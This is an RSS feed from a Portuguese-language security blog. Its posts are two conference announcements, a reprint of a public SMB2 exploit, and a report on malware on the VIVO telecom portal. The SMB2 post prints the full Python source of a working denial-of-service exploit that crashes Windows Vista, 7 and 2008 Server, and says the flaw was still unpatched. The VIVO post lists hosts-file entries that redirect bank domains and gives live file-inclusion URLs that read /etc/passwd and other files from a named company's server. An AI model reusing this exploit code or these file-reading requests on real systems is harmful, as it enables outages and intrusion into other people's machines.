<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Safe or Unsafe ?</title>
	<atom:link href="http://safeorunsafe.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://safeorunsafe.wordpress.com</link>
	<description>are you really safe?</description>
	<lastBuildDate>Fri, 11 Dec 2009 11:06:52 +0000</lastBuildDate>
	<language>pt-br</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='safeorunsafe.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Safe or Unsafe ?</title>
		<link>http://safeorunsafe.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://safeorunsafe.wordpress.com/osd.xml" title="Safe or Unsafe ?" />
	<atom:link rel='hub' href='http://safeorunsafe.wordpress.com/?pushpress=hub'/>
		<item>
		<title>### Next Hop &#8211; YSTS 4.0 ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/12/11/next-hop-ysts-4-0/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/12/11/next-hop-ysts-4-0/#comments</comments>
		<pubDate>Fri, 11 Dec 2009 10:56:24 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Eventos]]></category>
		<category><![CDATA[call for papers]]></category>
		<category><![CDATA[h2hc]]></category>
		<category><![CDATA[ysts]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=243</guid>
		<description><![CDATA[Estive na H2HC e realmente foi um evento fantástico, quero parabenizar o Rodrigo Rubira Branco e todos que participaram da organização do evento pois ele foi realmente muito bom. Palestras do mais alto nível e a possibilidade de conversar com pessoas que realmente são referência na área de segurança da informação como Willian Caprino, Anderson [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=243&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Estive na H2HC e realmente foi um evento fantástico, quero parabenizar o <a href="http://br.linkedin.com/in/rrbranco" target="_blank">Rodrigo Rubira Branco</a> e todos que participaram da organização do evento pois ele foi realmente muito bom. Palestras do mais alto nível e a possibilidade de conversar com pessoas que realmente são referência na área de segurança da informação como Willian Caprino, Anderson Ramos, Rodrigo Montoro e mais diversas pessoas que tive a oportunidade de conhecer.</p>
<p>Terminada a H2HC já foram iniciados os preparativos para outro evento muito importante no circuito brasileiro de conferências de segurança (tá bom, não temos tantas conferências de alto nível assim &#8230; rs) &#8230; está aberto o call for papers para o <a href="http://www.ysts.org/" target="_blank">YSTS 4</a> que será realizado no dia 17 de maio de 2010 na cidade de São Paulo. Abaixo seguem os detalhes:</p>
<p>###</p>
<div>
<p><strong>- = Call for Papers = -</strong></p>
<p>A chamada de artigos para a conferencia yStS (you Sh0t the Sheriff) está aberta!</p>
<p>A quarta edição irá acontecer novamente em São Paulo, Brasil, no dia<br />
17 de Maio de 2010.<br />
<strong>INTRODUCAO</strong></p>
<p>O you sh0t the Sheriff é um evento único, dedicado a mostrar os temas<br />
mais interessantes e atuais relacionados à segurança da informação,<br />
trazendo uma combinação de palestras de alta qualidade com<br />
palestrantes renomados de diversas partes do planeta e cobrindo<br />
diversos tópicos sobre o tema.</p>
<p>Nosso objetivo principal é permitir que os participantes tenham uma<br />
visão do estado atual da segurança no mundo, combinando diferentes<br />
segmentos da área.<br />
O evento é basicamente para convidados, assim sendo, submeter uma<br />
apresentação é certamente uma boa maneira de tentar participar,<br />
principalmente se você reside no Brasil</p>
<p>Em função do sucesso das edições passadas, nós mantivemos o evento no<br />
mesmo formato:</p>
<p>- Ambiente descontraído<br />
- O YSTS 4 vai acontecer em um local secreto (anunciado somente aos<br />
participantes algumas semanas antes do dia da conferencia)<br />
- Novamente o este local secreto será em um aprazível bar ou pub<br />
- E sim, teremos (alguma) comida e (bastante) bebida</p>
<p><strong>TÓPICOS</strong></p>
<p>O foco do YSTS 4 são assuntos relacionados com segurança da<br />
informação, incluindo (mas não limitado a):</p>
<p>* Sistemas operacionais<br />
* Tópicos sobre Gestão e Carreira<br />
* Dispositivos móveis/sistemas embarcados<br />
* Auditoria e controle<br />
* Redes sociais<br />
* Políticas de segurança<br />
* Problemas com protocolos<br />
* Redes/Telecomunicações<br />
* Redes sem fio e Radiofreqüência em geral<br />
* Resposta a incidentes<br />
* Information Warfare<br />
* Guerra de informação<br />
* Código malicioso / BotNets<br />
* Falhas dirigidas a usuários<br />
* Programação segura<br />
* Hacker Spaces / Comunidades hacker<br />
* Fuzzing<br />
* Segurança física<br />
* Virtualização<br />
* Segurança em aplicações WEB<br />
* Computação nas nuvens<br />
* Criptografia / Ofuscação<br />
* Infra-estrutura e sistemas críticos<br />
* Bafômetro hacks<br />
* E qualquer outra coisa relacionada com segurança que você imagine<br />
que seja interessante ser apresentada na conferência</p>
<p>Nós gostamos de palestras curtas, então, por favor, lembre-se que sua<br />
palestra deve caber em no máximo 30 minutos.</p>
<p>Como novidade, este ano nós também aceitaremos palestras de 15 minutos.</p>
<p>Algumas pessoas não precisam de 30 minutos para passa sua mensagem ou<br />
gostariam de falar sobre um projeto recém iniciado. Para estes casos<br />
15 minutos será suficiente.</p>
<p>You sh0t the Sheriff é certamente a conferencia perfeita para lançar seus projetos novos, confie em nós.</p>
<p>###</p>
<p>Enviem seus papers, com certeza é uma das principais conferências sobre segurança da informação e é também uma ótima oportunidade para fazer novos amigos &#8230; este ano estou me organizado com antecedência e com certeza estarei lá !</p>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/243/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/243/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/243/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/243/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/243/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/243/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/243/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/243/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=243&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/12/11/next-hop-ysts-4-0/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
		<item>
		<title>### H2HC &#8211; Hackers to Hackers Conference &#8230; Coming ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/11/10/h2hc-hackers-to-hackers-conference-coming/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/11/10/h2hc-hackers-to-hackers-conference-coming/#comments</comments>
		<pubDate>Tue, 10 Nov 2009 15:54:53 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Eventos]]></category>
		<category><![CDATA[segurança da informação]]></category>
		<category><![CDATA[h2hc]]></category>
		<category><![CDATA[evento]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=228</guid>
		<description><![CDATA[Após algum tempo de inatividade mais um post, desta vez lembrando que a data de um dos principais eventos com foco em segurança da informação no Brasil está chegando. Nos dias 28 e 29 de Novembro será realizado em São Paulo a H2HC (Hackers to Hackers Conference &#8211; www.h2hc.com.br), contando com 11 palestras internacionais com [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=228&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Após algum tempo de inatividade mais um post, desta vez lembrando que a data de um dos principais eventos com foco em segurança da informação no Brasil está chegando. Nos dias 28 e 29 de Novembro será realizado em São Paulo a H2HC (Hackers to Hackers Conference &#8211; <a href="http://www.h2hc.com.br" target="_blank">www.h2hc.com.br</a>), contando com 11 palestras internacionais com tradução simultânea e muito mais !</p>
<p>Abaixo segue a lista com os palestrantes confirmados (lista em ordem alfabética):</p>
<ul>
<li><strong><span style="text-decoration:none;">Alex Kirk &#8211; (AEGIS Program Lead, Sourcefire Vulnerability Research Team)</span></strong></li>
<li><strong><span style="text-decoration:none;">Andres Riancho &#8211; (Creator w3af / Independent Network Consultant)</span></strong></li>
<li><strong><span style="text-decoration:none;">Andrew Cushman &#8211; (Senior Director &#8211; Security Business Unit, Microsoft)</span></strong></li>
<li><strong><span style="text-decoration:none;">Bruno Oliveira &#8211; (Analista de Intrusao, iBliss)</span></strong></li>
<li><strong><span style="text-decoration:none;">Carlos Sarraute &#8211; (Security Researcher, CoreLabs, Core Security Research Lab)</span></strong></li>
<li><strong><span style="text-decoration:none;">Cesar Cerrudo &#8211; (Founder, Argeniss Information Security)</span></strong></li>
<li><strong><span style="text-decoration:none;">Edgar Barbosa &#8211; (Security Researcher, COSEINC)</span></strong></li>
<li><strong><span style="text-decoration:none;">Filipe Alcarde Balestra &#8211; (Security Researcher, Firewalls)</span></strong></li>
<li><strong><span style="text-decoration:none;">Gustavo Scotti &#8211; (Software Developer, Immunity Inc.)</span></strong></li>
<li><strong><span style="text-decoration:none;">Jayson E. Street &#8211; (Consultant, Author of the book: &#8220;Dissecting the hack: The F0rb1dd3n Network&#8221;)</span></strong></li>
<li><strong><span style="text-decoration:none;">Joaquim Espinhara &#8211; (Consultor de Segurança, SecureInfo)</span></strong></li>
<li><strong><span style="text-decoration:none;">Jonathan Brossard &#8211; (CTO, MIG Development Paris)</span></strong></li>
<li><strong><span style="text-decoration:none;">Jose Antonio Milagre &#8211; (Perito Computacional e Advogado especialista em Direito Digital)</span></strong></li>
<li><strong><span style="text-decoration:none;">Juliano Rizzo &#8211; (Founder, Software Developer, Security Consultant &#8211; NETIFERA)</span></strong></li>
<li><strong><span style="text-decoration:none;">Nelson Brito &#8211; (Independent Researcher)</span></strong></li>
<li><strong><span style="text-decoration:none;">Nicolas Waisman &#8211; (Senior Security Researcher, Immunity Inc.)</span></strong></li>
<li><strong><span style="text-decoration:none;">Paulo Roizman &#8211; (Pesquisador Independente)</span></strong></li>
<li><strong><span style="text-decoration:none;">Philippe Langlois &#8211; (Founder of P1 Security and Senior Researcher for Telecom Security Task Force)</span></strong></li>
<li><strong><span style="text-decoration:none;">Rodrigo Carvalho Costa &#8211; (Pesquisador de Segurança Independente)</span></strong></li>
<li><strong><span style="text-decoration:none;">Rodrigo Rubira Branco (BSDaemon) &#8211; (Senior Vulnerability Researcher, COSEINC / Member, RISE Security Research Group)</span></strong></li>
<li><strong><span style="text-decoration:none;">Sebastian Porst &#8211; (BinNavi Lead Developer, Zynamics)</span></strong></li>
<li><strong><span style="text-decoration:none;">Thiago Bordini &#8211; (Analista de Segurança, Skylan Technology)</span></strong></li>
<li><strong><span style="text-decoration:none;">Tony Rodrigues &#8211; (Independent Consultant)</span></strong></li>
<li><strong><span style="text-decoration:none;">Wagner Elias &#8211; (Leader Project Brazil, OWASP)</span></strong></li>
<li><strong><span style="text-decoration:none;">Weber Ress &#8211; (MVP, Software Engineer, Not-disclosed)</span></strong></li>
<li><strong><span style="text-decoration:none;">Wendel Guglielmetti Henrique &#8211; (Pentester, Trustwave SpiderLabs)</span></strong></li>
</ul>
<p>Link para a grade de palestras <a href="http://www.h2hc.com.br/palestrantes.php" target="_blank">aqui</a> (neste link está o título e uma breve descrição sobre cada uma das palestras).</p>
<p>Minha inscrição já está feita  e nos dias 28/11 e 29/11 estarei prestigiando o evento, encontro vocês lá !</p>
<p>OBS: Apenas para constar, assistam a palestra do Bruno Oliveira, vai ser interessante do conteúdo a apresentação ! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/228/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/228/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/228/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=228&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/11/10/h2hc-hackers-to-hackers-conference-coming/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
		<item>
		<title>### MS Windows Vista / 7 / 2008 Server- Exploit DOS ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/09/09/ms-windows-vista-7-2008-server-exploit-dos/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/09/09/ms-windows-vista-7-2008-server-exploit-dos/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 20:09:46 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[2008 server]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[seven]]></category>
		<category><![CDATA[smb]]></category>
		<category><![CDATA[vista]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=215</guid>
		<description><![CDATA[Acaba de ser publicado no site milw0rm um exploit de DOS para os sistemas operacionais Windows Vista, Windows 7 e Windows 2008 Server em todas as suas versões. Ao ser executado o exploit estabelece comunicação com o alvo e através da porta 445 e causa o DOS no alvo utilizando o protocolo SMB, que tem [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=215&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">Acaba de ser publicado no site milw0rm um exploit de DOS para os sistemas operacionais Windows Vista, Windows 7 e Windows 2008 Server em todas as suas versões. Ao ser executado o exploit estabelece comunicação com o alvo e através da porta 445 e causa o DOS no alvo utilizando o protocolo SMB, que tem um falha ao tratar cabeçalhos mal formados que são utilizados no início da comunicação entre cliente e servidor, para determinar qual a versão do protocolo SMB que será utilizada na comunicação. Sabendo desta falha é enviado um payload com cabeçalho mal formado que acaba causando um despejo de memória e é exibida instantaneamente a tela azul da morte na máquina alvo.</p>
<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">Abaixo segue o fonte do exploit (extraído do site milw0rm <a href="http://www.milw0rm.com/exploits/9594"><span style="color:#4a2486;text-decoration:underline;">aqui</span></a>) que diga-se de passagem é extremamente simples &#8230;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">#!/usr/bin/python</p>
<p style="line-height:18px;font:12px Consolas;margin:0;"># When SMB2.0 recieve a &#8220;&amp;&#8221; char in the &#8220;Process Id High&#8221; SMB header field it dies with a</p>
<p style="line-height:18px;font:12px Consolas;margin:0;"># PAGE_FAULT_IN_NONPAGED_AREA</p>
<p style="line-height:18px;font:12px Consolas;min-height:14px;margin:0;">
<p style="line-height:18px;font:12px Consolas;margin:0;">from socket import socket</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">from time import sleep</p>
<p style="line-height:18px;font:12px Consolas;min-height:14px;margin:0;">
<p style="line-height:18px;font:12px Consolas;margin:0;">host = &#8220;IP_ADDR&#8221;, 445</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">buff = (</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x00\x00\x00\x90&#8243; # Begin SMB header: Session message</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\xff\x53\x4d\x42&#8243; # Server Component: SMB</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x72\x00\x00\x00&#8243; # Negociate Protocol</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x00\x18\x53\xc8&#8243; # Operation 0&#215;18 &amp; sub 0xc853</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x00\x26&#8243;# Process ID High: &#8211;&gt;  <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />   normal value should be &#8220;\x00\x00&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe&#8221;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c&#8221;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c&#8221;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e&#8221;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">&#8220;\x30\x30\x32\x00&#8243;</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">)</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">s = socket()</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">s.connect(host)</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">s.send(buff)</p>
<p style="line-height:18px;font:12px Consolas;margin:0;">s.close()</p>
<p style="line-height:19px;font:13px Georgia;min-height:15px;margin:0 0 13px;">
<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">Realizei o teste do exploit em uma máquina com Windows 7 e outra com Windows 2008 Server e nos dois casos ele funcionou sem problemas &#8230; exploit executado &#8230; máquina Windows travada ! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">
<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">
<div id="attachment_217" class="wp-caption aligncenter" style="width: 520px"><img class="size-full wp-image-217" title="tela_azul" src="http://safeorunsafe.files.wordpress.com/2009/09/tela_azul1.jpg?w=510&#038;h=382" alt="-- Exploit travando um Windows 2008 Server --" width="510" height="382" /><p class="wp-caption-text">-- Exploit travando um Windows 2008 Server --</p></div>
<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">
<p style="line-height:19px;font:13px Georgia;margin:0 0 13px;">Fiquem espertos, pois esta vulnerabilidade ainda não tem correção !!!</p>
<p style="font:11px Calibri;min-height:13px;margin:0 0 10px;">
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/215/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/215/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/215/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/215/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/215/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/215/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/215/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/215/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=215&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/09/09/ms-windows-vista-7-2008-server-exploit-dos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>

		<media:content url="http://safeorunsafe.files.wordpress.com/2009/09/tela_azul1.jpg" medium="image">
			<media:title type="html">tela_azul</media:title>
		</media:content>
	</item>
		<item>
		<title>### Falhas Graves &#8211; Portal VIVO ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/09/09/falhas-graves-malware-portal-vivo/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/09/09/falhas-graves-malware-portal-vivo/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 15:41:03 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Malwares]]></category>
		<category><![CDATA[applet]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[vivo]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=206</guid>
		<description><![CDATA[Ontem a noite alguns usuários notaram um comportamento anormal ao entrarem no portal da VIVO. Logo na página inicial do portal era solicitado que um Applet fosse executado para supostamente &#8220;Executar Corretamente o VIVO online&#8221;.  Ao executar o Applet um malware é injetado no computador do usuário que está acessando o portal e tenta modificar [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=206&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Ontem a noite alguns usuários notaram um comportamento anormal ao entrarem no portal da VIVO. Logo na página inicial do portal era solicitado que um Applet fosse executado para supostamente &#8220;Executar Corretamente o VIVO online&#8221;.  Ao executar o Applet um malware é injetado no computador do usuário que está acessando o portal e tenta modificar o arquivo de hosts da máquina criando as seguintes entradas:</p>
<p>69.162.114.180 santander.com.br<br style="line-height:1.22em;" />69.162.114.180 www.santander.com.br<br style="line-height:1.22em;" />69.162.114.181 itau.com.br<br style="line-height:1.22em;" />69.162.114.181 www.itau.com.br<br style="line-height:1.22em;" />69.162.114.181 www.itau.com<br style="line-height:1.22em;" />69.162.114.181 itau.com<br style="line-height:1.22em;" />69.162.114.181 itaupersonnalite.com.br<br style="line-height:1.22em;" />69.162.114.181 www.itaupersonnalite.com.br<br style="line-height:1.22em;" />69.162.114.182 www.bradesco.com.br<br style="line-height:1.22em;" />69.162.114.182 bradesco.com.br<br style="line-height:1.22em;" />69.162.114.182 www.bradesco.com<br style="line-height:1.22em;" />69.162.114.182 bradesco.com<br style="line-height:1.22em;" />69.162.114.182 www.bradescoempresa.com.br<br style="line-height:1.22em;" />69.162.114.182 bradescoempresa.com.br<br style="line-height:1.22em;" />69.162.114.182 www.bradescoprime.com.br<br style="line-height:1.22em;" />69.162.114.182 bradescoprime.com.br<br style="line-height:1.22em;" />69.162.114.182 bradescocartoes.com.br<br style="line-height:1.22em;" />69.162.114.182 www.bradescocartoes.com.br<br style="line-height:1.22em;" />69.162.114.179 www.nossacaixa.com.br<br style="line-height:1.22em;" />69.162.114.179 nossacaixa.com.br</p>
<p>Conforme podemos verificar acima, o que o malware faz é criar apontamentos no hosts para que quando o usuário tente acessar um dos sites de bancos existentes na listagem acima, ele seja redirecionado para um site clonado que irá gravar seus dados de conta e senhas.</p>
<div id="attachment_208" class="wp-caption aligncenter" style="width: 520px"><img class="size-full wp-image-208 " title="Clone do Site da Nossa Caixa" src="http://safeorunsafe.files.wordpress.com/2009/09/picture-4.png?w=510&#038;h=309" alt="Clone do Site da Caixa" width="510" height="309" /><p class="wp-caption-text">Clone do Site da Nossa Caixa</p></div>
<p>O malware descrito acima já foi removido do portal da VIVO, porém ainda existem algumas vulnerabilidades que não foram corrigidas no portal. Caso você utilize alguma das urls abaixo conseguirá exibir o conteúdo de arquivos críticos do servidor da VIVO que está comprometido.</p>
<p><a href="http://www.vivo.com.br/roaminginternacional/popup.php?url=/etc/passwd" target="_blank">http://www.vivo.com.br/roaminginternacional/popup.php?url=/etc/passwd</a></p>
<p><a href="http://www.vivo.com.br/roaminginternacional/popup.php?url=/etc/group" target="_blank">http://www.vivo.com.br/roaminginternacional/popup.php?url=/etc/group</a></p>
<p><a href="http://www.vivo.com.br/roaminginternacional/popup.php?url=/etc/hosts" target="_blank">http://www.vivo.com.br/roaminginternacional/popup.php?url=/etc/hosts</a></p>
<p>Simplesmente modificando a string após o url= você consegue exibir outros arquivos armazenados neste servidor. (os links acima podem deixar de funcionar assim que a VIVO corrija a vulnerabilidade).</p>
<p>Fiquem de olho ao navegarem na internet, pois mesmo sites populares e de grandes empresas podem ser vítimas de ataques para comprometer a segurança de seus usuários.</p>
